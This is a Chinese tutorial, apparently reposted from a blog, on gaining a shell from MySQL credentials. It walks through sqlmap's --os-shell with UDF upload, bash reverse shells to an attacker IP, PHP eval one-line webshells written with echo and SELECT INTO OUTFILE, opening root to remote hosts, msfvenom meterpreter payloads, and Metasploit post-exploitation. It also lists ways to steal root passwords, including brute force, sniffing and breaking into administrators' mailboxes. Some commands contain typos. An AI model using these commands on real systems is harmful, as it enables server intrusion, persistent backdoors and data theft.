标签：sqlmap 直连 shell 数据库 获取 webshell MySQL php

4.3 使用sqlmap直连MySQL获取webshell

在一些场景下，需要通过MySQL直接连接来获取权限，如果通过暴力破解，嗅探等方法获取了账户和密码，而服务器没开放Web服务的情况，那么就得直接通过数据库获取一定的权限了

4.3.1 使用场景

(1) 获取了MySQL数据库账户和密码

(2) 可以访问3306端口及数据库

4.3.2 扫描获取root账户的密码

通常有下面一些方法来获取root账户的密码

(1) phpMyAdmin 多线程批量破解工具，可以通过收集phpMyAdmin地址进行暴力破解

(2) 代码泄露获取数据库账户和密码

(3) 文件包含读取配置文件中的数据库账户和密码

(4) 通过网络嗅探获取

(5) 渗透运维人员的邮箱及个人主机获取

4.3.3 获取shell

1. 通过sqlmap连接MySQL获取shell

(1) 直接连接数据库

sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

(2) 通过选择32位或者64位操作系统webshell，执行

bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

(4) 通过echo命令生成shell

echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

如果可以通过phpmyadmin管理数据库，就可以修改host为"%" 并执行权限更新操作，具体如下：

use mysql;

update user set host = '%' where user = 'root';

flush privileges;

注意：如果数据库中有都个host连接，修改时可能会导致数据库连接出问题

2. 通过MSF反弹获取shell

(1) 使用msfvenom生成MSF反弹的PHP脚本木马，默认端口4444

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 10.12.22.33  //这个IP地址就是自己的独立服务器IP地址，

show options

run 0 或者 exploit

(3) 上传并执行PHP文件

将上面生成的bmfx.php文件上传至目标站点，然后访问，如果没有问题的话，那么MSF会显示成功反弹shell

3. 通过PHPMyAdmin管理解码查询生成webshell

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

4.3.4 实例演示

1. 直接连接MySQL数据库

sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

如果上述成功了， 会让你选中服务器架构是32位还是64位

2. 上传UDF文件

在上述操作选择系统架构之后，sqlmap会自动上传UDF文件到服务器提权位置，记住，不管获取的shell是否成功都会显示os-shell提示符

3. 执行命令

cat /etc/passwd

如果是真的成功获取了shell，那么执行的结果就是我们想要的信息

4. 获取反弹shell

虽然通过sqlmap获取了shell，但实际操作的话着实不方便，需要使用独立的服务器进行反弹shell

nc -lvnp 9988

在sqlmap的shell执行

bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

5. 在服务器上生成webshell

上述操作如果没有任何问题，那么就可以找到真实路径直接生成webshell，可以在获取的反弹shell中执行locate *.php找到网站的真实路径，然后在该路径下通过echo命令生成webshell，具体如下：

echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

6. 获取webshell

上面在服务器上生成的webshell是一句话，可以通过中国菜刀连接此一句话，进行获取webshell

7. 通过phpMyAdmin生成一句话后门

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

8. 通过MSF反弹获取shell

9. MSF提权参考

通过MSF反弹shell，执行background将Session放在后台运行，然后搜索可以利用的exploit来进行测试，具体命令如下：

background

search "关键字"  //这里是跟漏洞相关的关键字，比如search tomcat 等等

use exploit/linux

show options

set session 1

exploit

sessions -i 1

getuid

 

 

 

标签：sqlmap,直连,shell,数据库,获取,webshell,MySQL,php
来源： https://www.cnblogs.com/autopwn/p/13200063.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。